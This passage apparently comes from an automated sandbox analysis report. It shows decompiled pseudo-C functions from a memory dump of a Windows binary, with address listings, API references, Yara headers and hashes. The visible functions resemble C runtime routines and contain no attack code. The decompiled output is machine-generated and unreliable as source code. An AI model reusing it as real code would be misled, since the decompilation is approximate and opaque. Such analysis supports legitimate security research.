                    																_v1276 = E01406A01(_t357, _t373, _t413) + 0x278;
                    																_push( &_v1256);
                    																_t276 = E01404F2E(_t357, _t413, _t425, _v536, _v536,  &_v820, 0x83,  &_v1248, 0x55);
                    																_t470 = _t468 - 0x2e4 + 0x18;
                    																__eflags = _t276;
                    																if(_t276 != 0) {
                    																	_t101 = _t357 + 2; // 0x6
                    																	_t443 = _t101 << 4;
                    																	__eflags = _t443;
                    																	_t277 =  &_v280;
                    																	_v724 = _t443;
                    																	_t416 =  *(_t443 + _t425);
                    																	_t374 = _t416;
                    																	while(1) {
                    																		_v712 = _v712 & 0x00000000;
                    																		__eflags =  *_t277 -  *_t374;
                    																		_t445 = _v724;
                    																		if( *_t277 !=  *_t374) {
                    																			break;
                    																		}
                    																		__eflags =  *_t277;
                    																		if( *_t277 == 0) {
                    																			L91:
                    																			_t278 = _v712;
                    																		} else {
                    																			_t452 =  *((intOrPtr*)(_t277 + 2));
                    																			__eflags = _t452 -  *((intOrPtr*)(_t374 + 2));
                    																			_v718 = _t452;
                    																			_t445 = _v724;
                    																			if(_t452 !=  *((intOrPtr*)(_t374 + 2))) {
                    																				break;
                    																			} else {
                    																				_t277 = _t277 + 4;
                    																				_t374 = _t374 + 4;
                    																				__eflags = _v718;
                    																				if(_v718 != 0) {
                    																					continue;
                    																				} else {
                    																					goto L91;
                    																				}
                    																			}
                    																		}
                    																		L93:
                    																		__eflags = _t278;
                    																		if(_t278 != 0) {
                    																			_t375 =  &_v280;
                    																			_t417 = _t375 + 2;
                    																			do {
                    																				_t279 =  *_t375;
                    																				_t375 = _t375 + 2;
                    																				__eflags = _t279 - _v712;
                    																			} while (_t279 != _v712);
                    																			_v728 = (_t375 - _t417 >> 1) + 1;
                    																			_t282 = E0140131B(_t375 - _t417 >> 1, 4 + ((_t375 - _t417 >> 1) + 1) * 2);
                    																			_v740 = _t282;
                    																			__eflags = _t282;
                    																			if(_t282 == 0) {
                    																				goto L84;
                    																			} else {
                    																				_v732 =  *((intOrPtr*)(_t445 + _t425));
                    																				_t125 = _t357 * 4; // 0xa094
                    																				_v744 =  *((intOrPtr*)(_t425 + _t125 + 0xa0));
                    																				_t128 = _t425 + 8; // 0x8b56ff8b
                    																				_v748 =  *_t128;
                    																				_t384 =  &_v280;
                    																				_v720 = _t282 + 4;
                    																				_t286 = E013FF144(_t282 + 4, _v728,  &_v280);
                    																				_t472 = _t470 + 0xc;
                    																				__eflags = _t286;
                    																				if(_t286 != 0) {
                    																					_t287 = _v712;
                    																					_push(_t287);
                    																					_push(_t287);
                    																					_push(_t287);
                    																					_push(_t287);
                    																					_push(_t287);
                    																					E013FDA8E();
                    																					asm("int3");
                    																					_t289 =  *0x143a65c; // 0x0
                    																					return _t289;
                    																				} else {
                    																					__eflags = _v280 - 0x43;
                    																					 *((intOrPtr*)(_t445 + _t425)) = _v720;
                    																					if(_v280 != 0x43) {
                    																						L102:
                    																						_t292 = E01404C3B(_t357, _t384, _t425,  &_v708);
                    																						_t386 = _v712;
                    																						 *(_t425 + 0xa0 + _t357 * 4) = _t292;
                    																					} else {
                    																						__eflags = _v278;
                    																						if(_v278 != 0) {
                    																							goto L102;
                    																						} else {
                    																							_t386 = _v712;
                    																							 *(_t425 + 0xa0 + _t357 * 4) = _t386;
                    																						}
                    																					}
                    																					__eflags = _t357 - 2;
                    																					if(_t357 != 2) {
                    																						__eflags = _t357 - 1;
                    																						if(_t357 != 1) {
                    																							__eflags = _t357 - 5;
                    																							if(_t357 == 5) {
                    																								 *((intOrPtr*)(_t425 + 0x14)) = _v716;
                    																							}
                    																						} else {
                    																							 *((intOrPtr*)(_t425 + 0x10)) = _v716;
                    																						}
                    																					} else {
                    																						_t450 = _v736;
                    																						_t418 = _t386;
                    																						_t396 = _t450;
                    																						 *(_t425 + 8) = _v716;
                    																						_v720 = _t450;
                    																						_v728 = _t450[8];
                    																						_v716 = _t450[9];
                    																						while(1) {
                    																							_t154 = _t425 + 8; // 0x8b56ff8b
                    																							__eflags =  *_t154 -  *_t396;
                    																							if( *_t154 ==  *_t396) {
                    																								break;
                    																							}
                    																							_t451 = _v720;
                    																							_t418 = _t418 + 1;
                    																							_t323 =  *_t396;
                    																							 *_t451 = _v728;
                    																							_v716 = _t396[1];
                    																							_t396 = _t451 + 8;
                    																							 *((intOrPtr*)(_t451 + 4)) = _v716;
                    																							_t357 = _v752;
                    																							_t450 = _v736;
                    																							_v728 = _t323;
                    																							_v720 = _t396;
                    																							__eflags = _t418 - 5;
                    																							if(_t418 < 5) {
                    																								continue;
                    																							} else {
                    																							}
                    																							L110:
                    																							__eflags = _t418 - 5;
                    																							if(__eflags == 0) {
                    																								_t178 = _t425 + 8; // 0x8b56ff8b
                    																								_t314 = E01409CD8(__eflags, _v712, 1, 0x1423c10, 0x7f,  &_v536,  *_t178, 1);
                    																								_t472 = _t472 + 0x1c;
                    																								__eflags = _t314;
                    																								_t315 = _v712;
                    																								if(_t314 == 0) {
                    																									_t450[1] = _t315;
                    																								} else {
                    																									do {
                    																										 *(_t458 + _t315 * 2 - 0x20c) =  *(_t458 + _t315 * 2 - 0x20c) & 0x000001ff;
                    																										_t315 = _t315 + 1;
                    																										__eflags = _t315 - 0x7f;
                    																									} while (_t315 < 0x7f);
                    																									_t318 = E013F60A6( &_v536,  *0x14353a0, 0xfe);
                    																									_t472 = _t472 + 0xc;
                    																									__eflags = _t318;
                    																									_t450[1] = 0 | _t318 == 0x00000000;
                    																								}
                    																								_t193 = _t425 + 8; // 0x8b56ff8b
                    																								 *_t450 =  *_t193;
                    																							}
                    																							 *(_t425 + 0x18) = _t450[1];
                    																							goto L121;
                    																						}
                    																						__eflags = _t418;
                    																						if(_t418 != 0) {
                    																							 *_t450 =  *(_t450 + _t418 * 8);
                    																							_t450[1] =  *(_t450 + 4 + _t418 * 8);
                    																							 *(_t450 + _t418 * 8) = _v728;
                    																							 *(_t450 + 4 + _t418 * 8) = _v716;
                    																						}
                    																						goto L110;
                    																					}
                    																					L121:
                    																					_t293 = _t357 * 0xc;
                    																					_t200 = _t293 + 0x1423b50; // 0x13c50b8
                    																					 *0x141a1a8(_t425);
                    																					_t295 =  *((intOrPtr*)( *_t200))();
                    																					_t389 = _v732;
                    																					__eflags = _t295;
                    																					if(_t295 == 0) {
                    																						__eflags = _t389 - 0x14354a0;
                    																						if(_t389 == 0x14354a0) {
                    																							L126:
                    																							_t296 = _v724;
                    																						} else {
                    																							_t449 = _t357 + _t357;
                    																							__eflags = _t449;
                    																							asm("lock xadd [eax], ecx");
                    																							if(_t449 != 0) {
                    																								goto L126;
                    																							} else {
                    																								_t218 = _t449 * 8; // 0x30ff068b
                    																								E014012E1( *((intOrPtr*)(_t425 + _t218 + 0x28)));
                    																								_t221 = _t449 * 8; // 0x30ff0c46
                    																								E014012E1( *((intOrPtr*)(_t425 + _t221 + 0x24)));
                    																								_t224 = _t357 * 4; // 0xa094
                    																								E014012E1( *((intOrPtr*)(_t425 + _t224 + 0xa0)));
                    																								_t296 = _v724;
                    																								_t392 = _v712;
                    																								 *(_t296 + _t425) = _t392;
                    																								 *(_t425 + 0xa0 + _t357 * 4) = _t392;
                    																							}
                    																						}
                    																						_t390 = _v740;
                    																						 *_t390 = 1;
                    																						_t283 =  *(_t296 + _t425);
                    																						 *((intOrPtr*)(_t425 + 0x28 + (_t357 + _t357) * 8)) = _t390;
                    																					} else {
                    																						 *((intOrPtr*)(_v724 + _t425)) = _t389;
                    																						_t205 = _t357 * 4; // 0xa094
                    																						E014012E1( *((intOrPtr*)(_t425 + _t205 + 0xa0)));
                    																						 *(_t425 + 0xa0 + _t357 * 4) = _v744;
                    																						E014012E1(_v740);
                    																						 *(_t425 + 8) = _v748;
                    																						goto L84;
                    																					}
                    																					goto L85;
                    																				}
                    																			}
                    																		} else {
                    																			_t283 = _t416;
                    																			goto L85;
                    																		}
                    																		goto L130;
                    																	}
                    																	asm("sbb eax, eax");
                    																	_t278 = _t277 | 0x00000001;
                    																	__eflags = _t278;
                    																	goto L93;
                    																} else {
                    																	L84:
                    																	_t283 = 0;
                    																	__eflags = 0;
                    																	L85:
                    																	__eflags = _v16 ^ _t458;
                    																	return E013F268B(_t283, _v16 ^ _t458);
                    																}
                    															} else {
                    																_t324 = _t440 + _t440;
                    																__eflags = _t324 - 0x106;
                    																if(_t324 >= 0x106) {
                    																	E013F37DE();
                    																	goto L82;
                    																} else {
                    																	 *((short*)(_t456 + _t324 - 0x10c)) = 0;
                    																	_t326 =  &_v276;
                    																	_push(_t326);
                    																	_push(_v460);
                    																	_push(_t421);
                    																	L83();
                    																	_t465 = _t468 + 0xc;
                    																	__eflags = _t326;
                    																	_t264 = _v452;
                    																	if(_t326 != 0) {
                    																		_t264 = _t264 + 1;
                    																		_v452 = _t264;
                    																	}
                    																	L54:
                    																	_t437 = _t352 + _t440 * 2;
                    																	_t363 = 0;
                    																	__eflags =  *_t437;
                    																	if( *_t437 == 0) {
                    																		L56:
                    																		__eflags = _t264;
                    																		L77:
                    																		if(__eflags != 0) {
                    																			goto L79;
                    																		} else {
                    																			_t249 = _t363;
                    																		}
                    																		goto L80;
                    																	} else {
                    																		_t437 = _t437 + 2;
                    																		__eflags =  *_t437;
                    																		if( *_t437 != 0) {
                    																			continue;
                    																		} else {
                    																			goto L56;
                    																		}
                    																	}
                    																}
                    															}
                    														}
                    													} else {
                    														_t327 = 0x3b;
                    														__eflags =  *_t352 - _t327;
                    														if( *_t352 != _t327) {
                    															break;
                    														} else {
                    															goto L48;
                    														}
                    													}
                    												}
                    											}
                    											goto L130;
                    										}
                    										_t249 = 0;
                    										goto L80;
                    									}
                    								}
                    							}
                    						}
                    					} else {
                    						__eflags = _t437;
                    						if(_t437 == 0) {
                    							_t249 =  *(_t421 + (_t249 + 2 + _t249 + 2) * 8);
                    						} else {
                    							_push(_t437);
                    							_push(_t249);
                    							_push(_t421);
                    							L83();
                    						}
                    						L80:
                    						__eflags = _v12 ^ _t456;
                    						return E013F268B(_t249, _v12 ^ _t456);
                    					}
                    				}
                    				L130:
                    			}
                    0x01405878
                    0x0140587b
                    0x01405881
                    0x00000000
                    0x00000000
                    0x01405883
                    0x01405887
                    0x014058b0
                    0x014058b0
                    0x01405889
                    0x01405889
                    0x0140588d
                    0x01405891
                    0x01405898
                    0x0140589e
                    0x00000000
                    0x014058a0
                    0x014058a0
                    0x014058a3
                    0x014058a6
                    0x014058ae
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x014058ae
                    0x0140589e
                    0x014058bd
                    0x014058bd
                    0x014058bf
                    0x014058c5
                    0x014058cb
                    0x014058ce
                    0x014058ce
                    0x014058d1
                    0x014058d4
                    0x014058d4
                    0x014058e4
                    0x014058f2
                    0x014058f7
                    0x014058fe
                    0x01405900
                    0x00000000
                    0x01405906
                    0x0140590c
                    0x01405912
                    0x01405919
                    0x0140591f
                    0x01405922
                    0x01405928
                    0x01405935
                    0x0140593c
                    0x01405941
                    0x01405944
                    0x01405946
                    0x01405b9f
                    0x01405ba5
                    0x01405ba6
                    0x01405ba7
                    0x01405ba8
                    0x01405ba9
                    0x01405baa
                    0x01405baf
                    0x01405bb0
                    0x01405bb5
                    0x0140594c
                    0x0140594c
                    0x0140595a
                    0x0140595d
                    0x01405978
                    0x0140597f
                    0x01405985
                    0x0140598b
                    0x0140595f
                    0x0140595f
                    0x01405967
                    0x00000000
                    0x01405969
                    0x01405969
                    0x0140596f
                    0x0140596f
                    0x01405967
                    0x01405992
                    0x01405995
                    0x01405ab2
                    0x01405ab5
                    0x01405ac2
                    0x01405ac5
                    0x01405acd
                    0x01405acd
                    0x01405ab7
                    0x01405abd
                    0x01405abd
                    0x0140599b
                    0x0140599b
                    0x014059a1
                    0x014059a9
                    0x014059ab
                    0x014059ae
                    0x014059b7
                    0x014059c0
                    0x014059c6
                    0x014059c6
                    0x014059c9
                    0x014059cb
                    0x00000000
                    0x00000000
                    0x014059cd
                    0x014059d3
                    0x014059d4
                    0x014059df
                    0x014059e7
                    0x014059ef
                    0x014059f2
                    0x014059f5
                    0x014059fb
                    0x01405a01
                    0x01405a07
                    0x01405a0d
                    0x01405a10
                    0x00000000
                    0x00000000
                    0x01405a12
                    0x01405a37
                    0x01405a37
                    0x01405a3a
                    0x01405a3e
                    0x01405a57
                    0x01405a5c
                    0x01405a5f
                    0x01405a61
                    0x01405a67
                    0x01405aa2
                    0x01405a69
                    0x01405a69
                    0x01405a6e
                    0x01405a76
                    0x01405a77
                    0x01405a77
                    0x01405a8e
                    0x01405a95
                    0x01405a98
                    0x01405a9d
                    0x01405a9d
                    0x01405aa5
                    0x01405aa8
                    0x01405aa8
                    0x01405aad
                    0x00000000
                    0x01405aad
                    0x01405a14
                    0x01405a16
                    0x01405a1b
                    0x01405a21
                    0x01405a2a
                    0x01405a33
                    0x01405a33
                    0x00000000
                    0x01405a16
                    0x01405ad0
                    0x01405ad0
                    0x01405ad4
                    0x01405adc
                    0x01405ae2
                    0x01405ae5
                    0x01405aeb
                    0x01405aed
                    0x01405b2d
                    0x01405b33
                    0x01405b7f
                    0x01405b7f
                    0x01405b35
                    0x01405b3a
                    0x01405b3a
                    0x01405b40
                    0x01405b44
                    0x00000000
                    0x01405b46
                    0x01405b46
                    0x01405b4a
                    0x01405b4f
                    0x01405b53
                    0x01405b58
                    0x01405b5f
                    0x01405b64
                    0x01405b6d
                    0x01405b73
                    0x01405b76
                    0x01405b76
                    0x01405b44
                    0x01405b85
                    0x01405b8d
                    0x01405b93
                    0x01405b96
                    0x01405aef
                    0x01405af5
                    0x01405af8
                    0x01405aff
                    0x01405b11
                    0x01405b18
                    0x01405b25
                    0x00000000
                    0x01405b25
                    0x00000000
                    0x01405aed
                    0x01405946
                    0x014058c1
                    0x014058c1
                    0x00000000
                    0x014058c1
                    0x00000000
                    0x014058bf
                    0x014058b8
                    0x014058ba
                    0x014058ba
                    0x00000000
                    0x01405844
                    0x01405844
                    0x01405844
                    0x01405844
                    0x01405846
                    0x0140584b
                    0x01405856
                    0x01405856
                    0x0140566d
                    0x0140566d
                    0x01405670
                    0x01405675
                    0x014057d2
                    0x00000000
                    0x0140567b
                    0x0140567d
                    0x01405685
                    0x0140568b
                    0x0140568c
                    0x01405692
                    0x01405693
                    0x01405698
                    0x0140569b
                    0x0140569d
                    0x014056a3
                    0x014056a5
                    0x014056a6
                    0x014056a6
                    0x014056b4
                    0x014056b4
                    0x014056b7
                    0x014056b9
                    0x014056bc
                    0x014056ca
                    0x014056ca
                    0x014057b4
                    0x014057b4
                    0x00000000
                    0x014057b6
                    0x014057b6
                    0x014057b6
                    0x00000000
                    0x014056be
                    0x014056be
                    0x014056c1
                    0x014056c4
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x014056c4
                    0x014056bc
                    0x01405675
                    0x01405667
                    0x0140563a
                    0x0140563c
                    0x0140563d
                    0x01405640
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x01405640
                    0x01405638
                    0x014055c0
                    0x00000000
                    0x014055b4
                    0x014056d1
                    0x00000000
                    0x014056d1
                    0x01405587
                    0x0140557c
                    0x01405571
                    0x0140552a
                    0x0140552a
                    0x0140552c
                    0x01405543
                    0x0140552e
                    0x0140552e
                    0x0140552f
                    0x01405530
                    0x01405531
                    0x01405536
                    0x014057c1
                    0x014057c6
                    0x014057d1
                    0x014057d1
                    0x01405528
                    0x00000000

                    APIs
                      • Part of subcall function 0140131B: HeapAlloc.KERNEL32(00000000,?,00000000,?,014013C1,?,00000000,?,00000003,01406A84), ref: 0140134D
                    • _free.LIBCMT ref: 01405471
                    • _free.LIBCMT ref: 01405488
                    • _free.LIBCMT ref: 014054A7
                    • _free.LIBCMT ref: 014054C2
                    • _free.LIBCMT ref: 014054D9
                    Memory Dump Source
                    • Source File: 00000000.00000002.471010691.00000000013C1000.00000020.00020000.sdmp, Offset: 013C0000, based on PE: true
                    • Associated: 00000000.00000002.470996422.00000000013C0000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.471134411.000000000141A000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.471322091.0000000001435000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.471355708.0000000001436000.00000008.00020000.sdmp
                    • Associated: 00000000.00000002.471404724.0000000001438000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.471435409.000000000143B000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.471459564.000000000143D000.00000002.00020000.sdmp
                    Yara matches
                    Similarity
                    • API ID: _free$AllocHeap
                    • String ID:
                    • API String ID: 1835388192-0
                    • Opcode ID: a8f91075d000b0fa9e833d97c8293dd47e73e5d098144cfbd0380e4272f0a29f
                    • Instruction ID: 57ca8dd85a768712d9bc6f5f666471f191d0a9252e0673ba1e9f0ab131a8d3b8
                    • Opcode Fuzzy Hash: a8f91075d000b0fa9e833d97c8293dd47e73e5d098144cfbd0380e4272f0a29f
                    • Instruction Fuzzy Hash: FD51A271A00305AFDB229F6BC881BAA77F4EF58721F55457EE909DB2A0E735D9018F40
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 89%
                    			E013C7B97(void* __edi) {
                    				char* _t62;
                    				void* _t66;
                    				void* _t75;
                    				intOrPtr _t87;
                    				void* _t88;
                    				void* _t94;
                    				signed char _t96;
                    				intOrPtr _t113;
                    				void* _t120;
                    				intOrPtr _t121;
                    				intOrPtr _t122;
                    				intOrPtr* _t126;
                    				void* _t127;
                    				void* _t128;
                    				void* _t129;
                    
                    				_t120 = __edi;
                    				_push(0x104);
                    				E013F26F6(E01415F6A);
                    				_t126 =  *((intOrPtr*)(_t127 + 8));
                    				 *((intOrPtr*)(_t127 - 0xa4)) = _t126;
                    				 *(_t127 - 0x98) = 0;
                    				 *((intOrPtr*)(_t126 + 0x14)) = 0xf;
                    				 *((intOrPtr*)(_t126 + 0x10)) = 0;
                    				_t133 =  *((intOrPtr*)(_t126 + 0x14)) - 0x10;
                    				 *((intOrPtr*)(_t127 - 4)) = 1;
                    				if( *((intOrPtr*)(_t126 + 0x14)) < 0x10) {
                    					_t62 = _t126;
                    				} else {
                    					_t62 =  *_t126;
                    				}
                    				 *_t62 = 0;
                    				_t96 = 1;
                    				 *(_t127 - 0x98) = 1;
                    				E013F5890(_t120, _t127 - 0x48, 0, 0x38);
                    				_t121 = E013F21A5(_t133, 0x40);
                    				_t129 = _t128 + 0x10;
                    				 *((intOrPtr*)(_t127 - 0x9c)) = _t121;
                    				 *((char*)(_t127 - 4)) = 2;
                    				_t134 = _t121;
                    				if(_t121 == 0) {
                    					_t66 = 0;
                    					__eflags = 0;
                    				} else {
                    					E013F5890(_t121, _t121, 0, 0x40);
                    					_t129 = _t129 + 0xc;
                    					_t66 = E013C2EE9(_t121, 0);
                    				}
                    				 *((char*)(_t127 - 4)) = 1;
                    				E013C33CD(_t127 - 0x48, _t121, _t134);
                    				 *((char*)(_t127 - 4)) = 3;
                    				E013F5890(_t121, _t127 - 0x94, 0, 0x4c);
                    				E013C285A(_t127 - 0x94);
                    				 *((char*)(_t127 - 4)) = 4;
                    				 *((intOrPtr*)( *((intOrPtr*)(_t127 - 0x84)) + 4))(_t127 - 0x48,  *0x1435004, 1, _t66);
                    				 *((char*)(_t127 - 4)) = 5;
                    				_t122 = E013F21A5(_t134, 0x4c);
                    				 *((intOrPtr*)(_t127 - 0xa0)) = _t122;
                    				 *((char*)(_t127 - 4)) = 6;
                    				_t135 = _t122;
                    				if(_t122 == 0) {
                    					_t75 = 0;
                    					__eflags = 0;
                    				} else {
                    					E013F5890(_t122, _t122, 0, 0x4c);
                    					_t87 = E013F21A5(_t135, 0x4c);
                    					 *((intOrPtr*)(_t127 - 0x9c)) = _t87;
                    					 *((char*)(_t127 - 4)) = 7;
                    					_t136 = _t87;
                    					if(_t87 == 0) {
                    						_t88 = 0;
                    						__eflags = 0;
                    					} else {
                    						E013F5890(_t122, _t87, 0, 0x4c);
                    						E013C2AD0(_t127 - 0xd8, 0x141a870);
                    						 *((char*)(_t127 - 4)) = 8;
                    						 *(_t127 - 0x98) = 3;
                    						E013C2AD0(_t127 - 0xc0, 0x141b8f4);
                    						_t96 = 7;
                    						 *((intOrPtr*)(_t127 - 4)) = 9;
                    						 *(_t127 - 0x98) = _t96;
                    						_t113 = E013F21A5(_t136, 0x10);
                    						 *((intOrPtr*)(_t127 - 0xa8)) = _t113;
                    						_t94 = 0;
                    						 *((intOrPtr*)(_t127 - 4)) = 0xa;
                    						_t137 = _t113;
                    						if(_t113 != 0) {
                    							asm("stosd");
                    							asm("stosd");
                    							asm("stosd");
                    							asm("stosd");
                    							_t94 = E013C2833(_t113, _t126);
                    							_t122 =  *((intOrPtr*)(_t127 - 0xa0));
                    						}
                    						 *((char*)(_t127 - 4)) = 9;
                    						_t88 = E013C2F1B( *((intOrPtr*)(_t127 - 0x9c)), 1, _t137, _t94, 1, 0, _t127 - 0xc0, _t127 - 0xd8);
                    					}
                    					 *((intOrPtr*)(_t127 - 4)) = 0xc;
                    					_t75 = E013C31B6(_t122, 0x1438790, _t127 - 0x94, _t88);
                    				}
                    				_push(_t75);
                    				 *((intOrPtr*)(_t127 - 4)) = 0xe;
                    				_push(1);
                    				_push(_t127 + 0xc);
                    				E013C334E(_t127 - 0x110, 1, _t137);
                    				 *((intOrPtr*)(_t127 - 0x110)) = 0x141b050;
                    				 *((intOrPtr*)(_t127 - 0x10c)) = 0x141b120;
                    				E013E6B80(_t127 - 0x104);
                    				if((_t96 & 0x00000004) != 0) {
                    					_t96 = _t96 & 0xfffffffb;
                    					E013C6118(_t127 - 0xc0, 1, 0);
                    				}
                    				if((_t96 & 0x00000002) != 0) {
                    					E013C6118(_t127 - 0xd8, 1, 0);
                    				}
                    				E013C3D57(_t127 - 0x88);
                    				 *((intOrPtr*)(_t127 - 0x4c)) = 0x141a9ac;
                    				 *((intOrPtr*)(_t127 - 0x48)) = 0x141b050;
                    				 *((intOrPtr*)(_t127 - 0x44)) = 0x141b120;
                    				E013E6B80(_t127 - 0x3c);
                    				E013C6118(_t127 + 0xc, 1, 0);
                    				return E013F26B1(_t126);
                    			}



















                    APIs
                    • __EH_prolog3_GS.LIBCMT ref: 013C7BA1
                    • new.LIBCMT ref: 013C7BEB
                    • new.LIBCMT ref: 013C7C71
                    • new.LIBCMT ref: 013C7C97
                    • new.LIBCMT ref: 013C7CFE
                      • Part of subcall function 013C2F1B: __EH_prolog3.LIBCMT ref: 013C2F22
                      • Part of subcall function 013C2F1B: new.LIBCMT ref: 013C2F43
                      • Part of subcall function 013C2F1B: new.LIBCMT ref: 013C2F62
                      • Part of subcall function 013C334E: __EH_prolog3.LIBCMT ref: 013C3355
                    Memory Dump Source
                    • Source File: 00000000.00000002.471010691.00000000013C1000.00000020.00020000.sdmp, Offset: 013C0000, based on PE: true
                    • Associated: 00000000.00000002.470996422.00000000013C0000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.471134411.000000000141A000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.471322091.0000000001435000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.471355708.0000000001436000.00000008.00020000.sdmp
                    • Associated: 00000000.00000002.471404724.0000000001438000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.471435409.000000000143B000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.471459564.000000000143D000.00000002.00020000.sdmp
                    Yara matches
                    Similarity
                    • API ID: H_prolog3$H_prolog3_
                    • String ID:
                    • API String ID: 4240126716-0
                    • Opcode ID: af35fea1a98221a89f8e07202686582cd07bfd0b389a3d5564973bd8aad6b90b
                    • Instruction ID: 8963606f9bab28a003357538bcb0ad3adc02373e073a71644c5e4a5dc75ef2c3
                    • Opcode Fuzzy Hash: af35fea1a98221a89f8e07202686582cd07bfd0b389a3d5564973bd8aad6b90b
                    • Instruction Fuzzy Hash: 6C6195B1900309EAFB24EB68CC45BDEBBB4AF64B08F14409DE609A72C1DBB45E44CF55
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 83%
                    			E01403DDF(signed int* __ecx, signed int __edx) {
                    				signed int _v8;
                    				intOrPtr* _v12;
                    				signed int _v16;
                    				signed int _t28;
                    				signed int _t29;
                    				intOrPtr _t33;
                    				signed int _t37;
                    				signed int _t38;
                    				signed int _t40;
                    				void* _t50;
                    				signed int _t56;
                    				intOrPtr* _t57;
                    				signed int _t68;
                    				signed int _t71;
                    				signed int _t72;
                    				signed int _t74;
                    				signed int _t75;
                    				signed int _t78;
                    				signed int _t80;
                    				signed int* _t81;
                    				signed int _t85;
                    				void* _t86;
                    
                    				_t72 = __edx;
                    				_v12 = __ecx;
                    				_t28 =  *__ecx;
                    				_t81 =  *_t28;
                    				if(_t81 != 0) {
                    					_t29 =  *0x1435234; // 0x78d9f939
                    					_t2 =  &(_t81[1]); // 0xb01848
                    					_t56 =  *_t81 ^ _t29;
                    					_t3 =  &(_t81[2]); // 0x80000003
                    					_t78 =  *_t2 ^ _t29;
                    					_t83 =  *_t3 ^ _t29;
                    					asm("ror edi, cl");
                    					asm("ror esi, cl");
                    					asm("ror ebx, cl");
                    					if(_t78 != _t83) {
                    						L14:
                    						_t22 = _v12 + 4; // 0xf0014387
                    						 *_t78 = E01406C42( *((intOrPtr*)( *_t22)));
                    						_t33 = E013F786E(_t56);
                    						_t57 = _v12;
                    						 *((intOrPtr*)( *((intOrPtr*)( *_t57)))) = _t33;
                    						_t24 = _t78 + 4; // 0xb0184c
                    						 *((intOrPtr*)( *((intOrPtr*)( *_t57)) + 4)) = E013F786E(_t24);
                    						 *((intOrPtr*)( *((intOrPtr*)( *_t57)) + 8)) = E013F786E(_t83);
                    						_t37 = 0;
                    						L15:
                    						return _t37;
                    					}
                    					_t38 = 0x200;
                    					_t85 = _t83 - _t56 >> 2;
                    					if(_t85 <= 0x200) {
                    						_t38 = _t85;
                    					}
                    					_t80 = _t38 + _t85;
                    					if(_t80 == 0) {
                    						_t80 = 0x20;
                    					}
                    					if(_t80 < _t85) {
                    						L9:
                    						_push(4);
                    						_t7 = _t85 + 4; // 0x80000007
                    						_t80 = _t7;
                    						_push(_t80);
                    						_v8 = E0140D7AC(_t56);
                    						_t40 = E014012E1(0);
                    						_t68 = _v8;
                    						_t86 = _t86 + 0x10;
                    						if(_t68 != 0) {
                    							goto L11;
                    						}
                    						_t37 = _t40 | 0xffffffff;
                    						goto L15;
                    					} else {
                    						_push(4);
                    						_push(_t80);
                    						_v8 = E0140D7AC(_t56);
                    						E014012E1(0);
                    						_t68 = _v8;
                    						_t86 = _t86 + 0x10;
                    						if(_t68 != 0) {
                    							L11:
                    							_t56 = _t68;
                    							_v8 = _t68 + _t85 * 4;
                    							_t83 = _t68 + _t80 * 4;
                    							_t78 = _v8;
                    							_push(0x20);
                    							asm("ror eax, cl");
                    							_t71 = _t78;
                    							_v16 = 0 ^  *0x1435234;
                    							asm("sbb edx, edx");
                    							_t74 =  !_t72 & _t68 + _t80 * 0x00000004 - _t78 + 0x00000003 >> 0x00000002;
                    							_v8 = _t74;
                    							if(_t74 == 0) {
                    								goto L14;
                    							}
                    							_t75 = _v16;
                    							_t50 = 0;
                    							do {
                    								_t50 = _t50 + 1;
                    								 *_t71 = _t75;
                    								_t71 = _t71 + 4;
                    							} while (_t50 != _v8);
                    							goto L14;
                    						}
                    						goto L9;
                    					}
                    				}
                    				return _t28 | 0xffffffff;
                    			}


























                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.471010691.00000000013C1000.00000020.00020000.sdmp, Offset: 013C0000, based on PE: true
                    • Associated: 00000000.00000002.470996422.00000000013C0000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.471134411.000000000141A000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.471322091.0000000001435000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.471355708.0000000001436000.00000008.00020000.sdmp
                    • Associated: 00000000.00000002.471404724.0000000001438000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.471435409.000000000143B000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.471459564.000000000143D000.00000002.00020000.sdmp
                    Yara matches
                    Similarity
                    • API ID: _free
                    • String ID:
                    • API String ID: 269201875-0
                    • Opcode ID: 8b80e98ec373d987bd24cd77b96dc7228f9542e46a2fdf8c591c1c1a469197ef
                    • Instruction ID: 057b70fee85f3fc1c393614e11ef44d85a0793d3d90d049fc5606bcc0d58feef
                    • Opcode Fuzzy Hash: 8b80e98ec373d987bd24cd77b96dc7228f9542e46a2fdf8c591c1c1a469197ef
                    • Instruction Fuzzy Hash: 85419436A002049FCB25DF6AC880A5EBBA5FF84724F15456EE515EB391D731AD01CB80
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 81%
                    			E01406A85(void* __ecx) {
                    				intOrPtr _t2;
                    				void* _t4;
                    				void* _t10;
                    				void* _t11;
                    				void* _t13;
                    				void* _t15;
                    				long _t16;
                    
                    				_t11 = __ecx;
                    				_t16 = GetLastError();
                    				_t10 = 0;
                    				_t2 =  *0x14353a4; // 0x6
                    				_t19 = _t2 - 0xffffffff;
                    				if(_t2 == 0xffffffff) {
                    					L2:
                    					_t15 = E014009B2(_t11, 1, 0x364);
                    					_pop(_t13);
                    					if(_t15 != 0) {
                    						_t4 = E01406F75(_t13, __eflags,  *0x14353a4, _t15);
                    						__eflags = _t4;
                    						if(_t4 != 0) {
                    							E01406873(_t13, _t15, 0x143a950);
                    							E014012E1(_t10);
                    							__eflags = _t15;
                    							if(_t15 != 0) {
                    								goto L9;
                    							} else {
                    								goto L8;
                    							}
                    						} else {
                    							_push(_t15);
                    							goto L4;
                    						}
                    					} else {
                    						_push(_t10);
                    						L4:
